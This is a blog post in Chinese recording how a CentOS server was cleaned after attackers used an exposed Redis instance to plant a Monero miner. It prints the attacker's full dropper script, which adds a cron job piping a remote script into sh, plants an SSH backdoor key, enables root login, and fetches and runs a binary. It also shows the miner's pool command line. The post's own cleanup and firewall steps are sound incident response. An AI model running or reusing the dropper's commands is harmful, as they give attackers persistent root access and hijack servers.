版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/chunlongyuan/article/details/79258443
刚开始搞服务器踩过的坑,贴出来分享下,当时应该是centos 6。
2016年10月15日23:01:55更新
该问题是因为 redis 可被外网访问的漏洞导致:黑客借此写入了定时任务,让系统每 10 分钟重新拉取并执行一次他的脚本,脚本内容如下:
[root@iZ25o9lq6f5Z ~]# cat pm.sh\?0706
# Attacker dropper script as captured on the compromised host, reproduced unmodified
# for analysis. Every path it touches is an indicator to check during cleanup.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# Persistence: overwrites root's crontab in both spool layouts so this same script is
# re-fetched over plain HTTP and piped to sh every 10 minutes. Cleanup: remove both
# files (or `crontab -r` as root) and verify with `crontab -l`.
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
# SSH backdoor, installed once (the dropped key file doubles as the "already done"
# marker): writes an attacker public key, deletes every existing authorized_keys*,
# then appends sshd_config directives that enable root login and point
# AuthorizedKeysFile at the attacker's file. Cleanup: delete ~/.ssh/KHK75NEOiq,
# strip the four appended lines from /etc/ssh/sshd_config, restore the legitimate
# authorized_keys, and restart sshd.
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
# Payload: if no "ntp" init script or systemd unit exists yet, downloads an
# architecture-specific binary (uname -m) to /opt/KHK75NEOiq33 and runs it with
# -Install — presumably this registers the fake "ntp" service started below; the
# binary itself is not shown here. Cleanup: /opt/KHK75NEOiq33, /etc/init.d/ntp,
# /etc/systemd/system/ntp.service — check these against the real ntp package first,
# since the name is chosen to blend in.
if [ ! -f "/etc/init.d/ntp" ]; then
if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
fi
fi
# Started unconditionally on every cron run, which is why the miner keeps coming
# back after a plain kill.
/etc/init.d/ntp start
# Kills any process whose command line contains "/usr/bin/cron" or "/opt/cron"
# (presumably rival malware; the system cron daemon is normally crond and is not
# matched by these patterns).
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
==该脚本里涉及到的文件夹和文件都需要处理:/var/spool/cron/root 与 /var/spool/cron/crontabs/root 两个定时任务文件、~/.ssh/KHK75NEOiq 以及被它删掉的 authorized_keys、/etc/ssh/sshd_config 末尾被追加的四行、/opt/KHK75NEOiq33 及其安装的 /etc/init.d/ntp 或 /etc/systemd/system/ntp.service==
彻底解决问题
配置防火墙
然后就是处理服务器里面的问题了==该脚本里涉及到的文件夹和文件都需要处理==
第一次编辑
查看CPU占用前十进程
[root@iZ25o9lq6f5Z ~]# ps -eo comm,pcpu --sort -pcpu | head -10
COMMAND %CPU
minerd 98.4
java 0.3
AliHids 0.3
AliYunDun 0.2
redis-server 0.1
java 0.1
init 0.0
kthreadd 0.0
migration/0 0.0
[root@iZ25o9lq6f5Z ~]#
kill掉minerd进程
[root@iZ25o9lq6f5Z ~]# ps aux | grep minerd
root 2449 98.4 0.5 239504 5376 ? SLsl Oct03 445:54 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:6666 -u 48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKkcvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp -p x
root 5384 0.0 0.0 103256 848 pts/0 S+ 06:53 0:00 grep minerd
[root@iZ25o9lq6f5Z ~]# kill -9 2449
[root@iZ25o9lq6f5Z ~]# ps aux | grep minerd
root 5386 0.0 0.0 103252 844 pts/0 S+ 06:53 0:00 grep minerd
[root@iZ25o9lq6f5Z ~]#
kill 后该进程马上又出现了(新 PID 5388,启动时间还是 06:53),说明有别的东西在不断重新拉起它,单独 kill 是没用的
[root@iZ25o9lq6f5Z opt]# ps aux | grep minerd
root 5388 98.2 0.3 239504 3364 ? SLsl 06:53 2:07 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:6666 -u 48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKkcvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp -p x
root 5405 0.0 0.0 103252 844 pts/0 S+ 06:55 0:00 grep minerd
[root@iZ25o9lq6f5Z opt]#
查看该进程的启动文件
[root@iZ25o9lq6f5Z opt]# ls -la /opt/
total 11172
drwxr-xr-x. 3 root root 4096 Oct 4 06:54 .
dr-xr-xr-x. 23 root root 4096 Sep 26 00:15 ..
-rwxr-xr-x. 1 root root 8444416 Sep 25 23:23 KHK75NEOiq33
-rwxr-xr-x. 1 root root 2979640 Oct 3 23:17 minerd
drwxr-xr-x. 2 root root 4096 Nov 22 2013 rh
[root@iZ25o9lq6f5Z opt]#
把 /opt 下的文件全部去掉执行权限并改为只读(chmod 400),这样即使再被拉起也执行不了;注意 rh 目录按时间戳(2013 年)看像是系统自带的,改成 400 后目录将无法进入,建议事后恢复
[root@iZ25o9lq6f5Z opt]# ll
total 11164
-rwxr-xr-x. 1 root root 8444416 Sep 25 23:23 KHK75NEOiq33
-rwxr-xr-x. 1 root root 2979640 Oct 3 23:17 minerd
drwxr-xr-x. 2 root root 4096 Nov 22 2013 rh
[root@iZ25o9lq6f5Z opt]# sudo chmod u-x minerd
[root@iZ25o9lq6f5Z opt]# ll
total 11164
-rwxr-xr-x. 1 root root 8444416 Sep 25 23:23 KHK75NEOiq33
-rw-r-xr-x. 1 root root 2979640 Oct 3 23:17 minerd
drwxr-xr-x. 2 root root 4096 Nov 22 2013 rh
[root@iZ25o9lq6f5Z opt]# sudo chmod 400 minerd
[root@iZ25o9lq6f5Z opt]# ll
total 11164
-rwxr-xr-x. 1 root root 8444416 Sep 25 23:23 KHK75NEOiq33
-r--------. 1 root root 2979640 Oct 3 23:17 minerd
drwxr-xr-x. 2 root root 4096 Nov 22 2013 rh
[root@iZ25o9lq6f5Z opt]# sudo chmod 400 KHK75NEOiq33
[root@iZ25o9lq6f5Z opt]# ll
total 11164
-r--------. 1 root root 8444416 Sep 25 23:23 KHK75NEOiq33
-r--------. 1 root root 2979640 Oct 3 23:17 minerd
drwxr-xr-x. 2 root root 4096 Nov 22 2013 rh
[root@iZ25o9lq6f5Z opt]# sudo chmod 400 rh
[root@iZ25o9lq6f5Z opt]# ll
total 11164
-r--------. 1 root root 8444416 Sep 25 23:23 KHK75NEOiq33
-r--------. 1 root root 2979640 Oct 3 23:17 minerd
dr--------. 2 root root 4096 Nov 22 2013 rh
再杀
[root@iZ25o9lq6f5Z opt]# ps aux | grep minerd
root 5388 98.5 0.3 239504 3364 ? SLsl 06:53 6:28 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:6666 -u 48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKkcvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp -p x
root 5428 0.0 0.0 103252 844 pts/0 S+ 06:59 0:00 grep minerd
[root@iZ25o9lq6f5Z opt]# kill -9 5388
[root@iZ25o9lq6f5Z opt]# ps aux | grep minerd
root 5435 0.0 0.0 103252 844 pts/0 S+ 07:00 0:00 grep minerd
[root@iZ25o9lq6f5Z opt]# ps aux | grep minerd
root 5439 0.0 0.0 103252 840 pts/0 S+ 07:00 0:00 grep minerd
[root@iZ25o9lq6f5Z opt]# ps -eo comm,pcpu --sort -pcpu | head -10
COMMAND %CPU
java 0.3
AliHids 0.3
AliYunDun 0.2
redis-server 0.1
java 0.1
init 0.0
kthreadd 0.0
migration/0 0.0
ksoftirqd/0 0.0
[root@iZ25o9lq6f5Z opt]#
查看定时脚本,同样被写入了恶意任务,crontab -l 看到的和 /var/spool/cron/crontabs/root 两处都要删掉
[root@iZ25o9lq6f5Z ~]# crontab -l
*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh
[root@iZ25o9lq6f5Z ~]#
[root@iZ25o9lq6f5Z ~]# cd /var/spool/cron/crontabs/
[root@iZ25o9lq6f5Z crontabs]# ll
total 4
-rw-r--r--. 1 root root 64 Oct 4 06:40 root
[root@iZ25o9lq6f5Z crontabs]# cat root
*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh
关闭 redis 外网访问(下面两条 iptables 规则只放行本机 127.0.0.1 访问 6379,其余一律拒绝;注意规则需要保存,否则重启后会丢失;更稳妥的做法是同时在 redis.conf 中只绑定本机地址并设置密码)
[root@iZ25o9lq6f5Z redis]# iptables -A INPUT -s 127.0.0.1 -p tcp --dport 6379 -j ACCEPT
[root@iZ25o9lq6f5Z redis]# iptables -A INPUT -p TCP --dport 6379 -j REJECT
修改服务器密码并重启;重启前确认 sshd_config 已恢复、攻击者的公钥已删除,否则对方仍然可以用密钥登录